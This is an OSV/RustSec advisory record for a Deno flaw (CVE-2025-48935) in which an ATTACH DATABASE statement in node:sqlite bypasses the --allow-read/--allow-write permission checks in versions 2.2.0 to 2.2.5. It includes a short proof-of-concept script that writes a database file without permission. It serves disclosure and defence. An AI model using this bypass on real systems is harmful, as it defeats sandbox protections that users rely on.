{"id":"RUSTSEC-2025-0138","summary":"--allow-read / --allow-write permission bypass in `node:sqlite`","details":"It is possible to bypass Deno's read/write permission\nchecks by using ATTACH DATABASE statement.\n\n## PoC\n\n```\n// poc.js\nimport { DatabaseSync } from \"node:sqlite\"\n\nconst db = new DatabaseSync(\":memory:\");\ndb.exec(\"ATTACH DATABASE 'test.db' as test;\");\n\ndb.exec(\"CREATE TABLE test.test (id INTEGER PRIMARY KEY, name TEXT);\");\n```\n\n```\n$ deno poc.js\n```","aliases":["CVE-2025-48935","GHSA-8vxj-4cph-c596"],"modified":"2025-12-29T10:25:55.204417Z","published":"2025-06-03T12:00:00Z","database_specific":{"license":"CC-BY-4.0"},"references":[{"type":"PACKAGE","url":"https://crates.io/crates/deno"},{"type":"ADVISORY","url":"https://rustsec.org/advisories/RUSTSEC-2025-0138.html"},{"type":"ADVISORY","url":"https://github.com/denoland/deno/security/advisories/GHSA-8vxj-4cph-c596"},{"type":"WEB","url":"https://github.com/denoland/deno/commit/31a97803995bd94629528ba841b2418d3ca01860"}],"affected":[{"package":{"name":"deno","ecosystem":"crates.io","purl":"pkg:cargo/deno"},"ranges":[{"type":"SEMVER","events":[{"introduced":"2.2.0"},{"fixed":"2.2.5"}]}],"ecosystem_specific":{"affected_functions":null,"affects":{"arch":[],"functions":[],"os":[]}},"database_specific":{"cvss":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P","source":"https://github.com/rustsec/advisory-db/blob/osv/crates/RUSTSEC-2025-0138.json","categories":[],"informational":null}}],"schema_version":"1.7.3","severity":[{"type":"CVSS_V4","score":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P"}]}